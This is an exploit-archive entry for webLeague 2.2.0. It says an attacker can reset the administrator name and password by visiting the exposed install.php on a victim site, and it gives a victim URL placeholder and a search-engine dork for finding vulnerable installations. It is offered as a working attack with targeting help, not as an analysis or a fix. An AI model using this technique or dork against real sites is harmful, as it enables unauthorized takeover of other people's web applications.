id: 5500
date: 07/15/2009
title: webLeague 2.2.0 (install.php) Remote Change Password Exploit
author: TiGeR-Dz
cves: 

============================================================
webLeague 2.2.0 (install.php) Remote Change Password Exploit
============================================================


#################################################################################
# WebLeague 2.2.0 (install.php)Remote Change Password                           #
#  By: TiGeR-Dz                                                                 #
#  POC :http://www.victim.com/path/install.php                                  #
#   Put Name and password :                                                     #
#  Dork:"powered by: WebLeague"                                                 #
#################################################################################



#  0day.today [2023-03-26]  #